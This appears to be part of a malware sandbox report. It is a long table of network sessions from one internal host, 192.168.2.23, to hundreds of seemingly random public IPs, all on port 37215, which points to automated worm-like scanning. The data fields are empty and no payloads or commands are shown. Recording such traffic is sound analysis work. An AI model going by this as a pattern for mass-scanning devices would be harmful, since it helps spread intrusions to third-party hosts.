                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13514192.168.2.2333816197.226.31.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13515192.168.2.235238841.56.135.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13516192.168.2.2349588157.152.228.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13517192.168.2.2355546197.138.13.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13518192.168.2.234939657.85.248.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13519192.168.2.233947441.232.121.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13520192.168.2.2356230197.105.92.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13521192.168.2.2345606197.66.165.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13522192.168.2.2340238137.43.140.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13523192.168.2.235967488.140.146.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13524192.168.2.2345552197.134.71.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13525192.168.2.2337960157.67.213.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13526192.168.2.2356144157.214.104.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13527192.168.2.2345520157.143.23.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13528192.168.2.23339442.217.174.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13529192.168.2.2344832201.100.60.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13530192.168.2.235420441.94.28.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13531192.168.2.233442841.71.75.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13532192.168.2.2334462157.67.211.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13533192.168.2.234265042.149.48.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13534192.168.2.2356736197.94.138.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13535192.168.2.235512441.191.80.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13536192.168.2.2352762157.114.166.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13537192.168.2.2338558157.48.220.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13538192.168.2.235520041.78.114.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13539192.168.2.2336086157.112.156.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13540192.168.2.2338970157.225.86.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13541192.168.2.2351236157.35.221.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13542192.168.2.2342896125.122.102.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13543192.168.2.2333518157.45.148.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13544192.168.2.2345288197.60.46.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13545192.168.2.2338586119.220.185.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13546192.168.2.233584054.35.176.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13547192.168.2.236024441.29.90.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13548192.168.2.2351378121.26.121.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13549192.168.2.2337676157.224.94.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13550192.168.2.2351276197.3.23.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13551192.168.2.2336234150.77.132.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13552192.168.2.2346992197.182.77.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13553192.168.2.2333212197.45.26.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13554192.168.2.2337348157.33.173.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13555192.168.2.2354818197.11.11.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13556192.168.2.234627441.220.22.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13557192.168.2.2347132197.251.223.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13558192.168.2.233882641.85.181.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13559192.168.2.2333844197.21.118.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13560192.168.2.234026041.56.247.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13561192.168.2.2340774197.191.28.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13562192.168.2.235424041.178.9.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13563192.168.2.235273441.166.209.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13564192.168.2.2336040217.104.128.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13565192.168.2.2343638205.237.252.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13566192.168.2.2354366197.108.156.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13567192.168.2.2344030167.141.222.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13568192.168.2.2351052157.255.77.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13569192.168.2.235677641.175.244.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13570192.168.2.235014641.107.244.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13571192.168.2.2342258157.164.136.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13572192.168.2.2334770197.54.102.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13573192.168.2.235915441.50.74.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13574192.168.2.2360858157.12.244.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13575192.168.2.2344126209.163.114.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13576192.168.2.2346840197.66.236.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13577192.168.2.2335038197.168.33.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13578192.168.2.2356016163.147.46.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13579192.168.2.2345822197.3.239.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13580192.168.2.2352052197.169.59.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13581192.168.2.2351578213.118.30.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13582192.168.2.234926041.35.227.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13583192.168.2.233805675.15.184.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13584192.168.2.2357088157.212.118.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13585192.168.2.2352438142.189.15.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13586192.168.2.2336916197.119.197.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13587192.168.2.2343318170.32.229.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13588192.168.2.2338878157.26.200.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13589192.168.2.2345690157.87.10.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13590192.168.2.2345386197.117.254.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13591192.168.2.235316041.0.21.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13592192.168.2.235084219.133.30.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13593192.168.2.2343336157.213.85.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13594192.168.2.2356826189.85.68.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13595192.168.2.2356420197.157.151.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13596192.168.2.233298058.199.234.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13597192.168.2.2340552157.95.159.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13598192.168.2.235718041.21.82.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13599192.168.2.2336208157.179.61.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13600192.168.2.2337068197.189.192.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13601192.168.2.2358250157.143.82.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13602192.168.2.2334670197.188.66.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13603192.168.2.235214470.73.235.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13604192.168.2.233953641.146.183.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13605192.168.2.235710841.101.13.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13606192.168.2.2351822180.225.33.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13607192.168.2.2345414157.250.251.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13608192.168.2.2341452157.177.180.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13609192.168.2.233830041.100.124.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13610192.168.2.234702441.173.71.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13611192.168.2.2351178197.58.107.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13612192.168.2.234586895.56.175.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13613192.168.2.234492441.187.10.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13614192.168.2.2342492222.58.238.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13615192.168.2.2351686152.95.75.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13616192.168.2.235568441.150.45.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13617192.168.2.234551842.0.122.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13618192.168.2.234102047.144.241.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13619192.168.2.2333800157.86.151.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13620192.168.2.2355394157.136.195.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13621192.168.2.2351618157.126.233.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13622192.168.2.2342356157.52.218.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13623192.168.2.2359382157.238.23.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13624192.168.2.2348784157.2.4.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13625192.168.2.2333660157.215.90.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13626192.168.2.235918041.90.134.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13627192.168.2.233766641.184.54.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13628192.168.2.2341920157.56.152.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13629192.168.2.2336766197.19.204.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13630192.168.2.236037441.40.10.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13631192.168.2.235843644.143.128.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13632192.168.2.235964841.85.107.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13633192.168.2.2353036157.54.231.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13634192.168.2.2345262197.225.74.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13635192.168.2.2360306197.4.169.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13636192.168.2.2341904157.130.80.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13637192.168.2.2349488157.253.209.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13638192.168.2.234258641.42.70.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13639192.168.2.235051641.49.203.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13640192.168.2.2341168157.189.139.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13641192.168.2.2349680157.34.87.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13642192.168.2.2351340197.206.8.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13643192.168.2.2353080105.123.19.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13644192.168.2.235460841.15.38.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13645192.168.2.235721241.156.220.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13646192.168.2.233955095.249.109.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13647192.168.2.235549241.189.165.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13648192.168.2.234089441.104.97.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13649192.168.2.2347062157.207.231.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13650192.168.2.234752241.239.254.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13651192.168.2.2347932197.227.54.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13652192.168.2.2335134197.144.91.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13653192.168.2.233947841.28.92.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13654192.168.2.2345968197.7.110.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13655192.168.2.233919261.194.162.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13656192.168.2.235801673.200.220.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13657192.168.2.2346878157.145.59.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13658192.168.2.2335334157.184.11.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13659192.168.2.2338636146.156.197.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13660192.168.2.234841441.197.177.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13661192.168.2.2342920157.167.242.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13662192.168.2.2359124157.109.246.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13663192.168.2.236049041.222.55.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13664192.168.2.2336206197.66.52.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13665192.168.2.235324241.228.83.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13666192.168.2.235356840.88.5.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13667192.168.2.2344140197.20.248.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13668192.168.2.2357814197.65.165.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13669192.168.2.2346308157.162.106.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13670192.168.2.2335678197.106.92.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13671192.168.2.234511041.193.219.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13672192.168.2.235063841.128.219.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13673192.168.2.235822241.85.67.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13674192.168.2.234667241.31.224.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13675192.168.2.23524525.32.53.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13676192.168.2.235270241.93.10.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13677192.168.2.2354554157.227.49.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13678192.168.2.2347878197.212.222.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13679192.168.2.2357724197.149.141.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13680192.168.2.2343124186.140.195.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13681192.168.2.2358020197.205.229.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13682192.168.2.233861041.230.188.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13683192.168.2.2350960197.11.134.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13684192.168.2.235064841.2.164.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13685192.168.2.2346780133.12.31.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13686192.168.2.2358980212.101.21.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13687192.168.2.2343824157.216.27.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13688192.168.2.234957441.212.233.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13689192.168.2.2354676157.254.37.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13690192.168.2.2337812157.145.166.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13691192.168.2.2349240197.185.84.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13692192.168.2.2351170157.141.89.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13693192.168.2.2334350197.117.187.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13694192.168.2.2357284157.29.134.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13695192.168.2.235467443.96.97.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13696192.168.2.234510041.230.247.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13697192.168.2.2336688197.126.158.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13698192.168.2.235418241.76.189.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13699192.168.2.2360646197.241.105.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13700192.168.2.2347824204.36.137.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13701192.168.2.233544441.99.111.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13702192.168.2.2347390157.209.231.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13703192.168.2.234787241.123.170.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13704192.168.2.2333716169.89.243.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13705192.168.2.2351842197.222.85.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13706192.168.2.233872841.149.1.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13707192.168.2.2349382188.144.112.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13708192.168.2.2335734157.198.208.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13709192.168.2.2338380157.171.34.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13710192.168.2.2333888194.173.82.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13711192.168.2.2357274157.131.211.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13712192.168.2.234290641.152.164.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13713192.168.2.233403441.157.153.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13714192.168.2.23480309.98.207.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13715192.168.2.235942041.147.110.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13716192.168.2.2357830200.162.217.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13717192.168.2.2337862157.227.48.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13718192.168.2.2348910157.15.30.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13719192.168.2.2338750197.116.247.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13720192.168.2.2360440157.5.53.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13721192.168.2.233424475.245.210.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13722192.168.2.234468841.42.144.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13723192.168.2.2341420114.117.76.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13724192.168.2.2353174136.253.66.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13725192.168.2.2341650147.13.61.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13726192.168.2.235666241.102.243.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13727192.168.2.2359254197.32.187.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13728192.168.2.2339730116.156.108.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13729192.168.2.234505847.170.83.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13730192.168.2.2350462114.164.50.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13731192.168.2.233503641.95.235.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
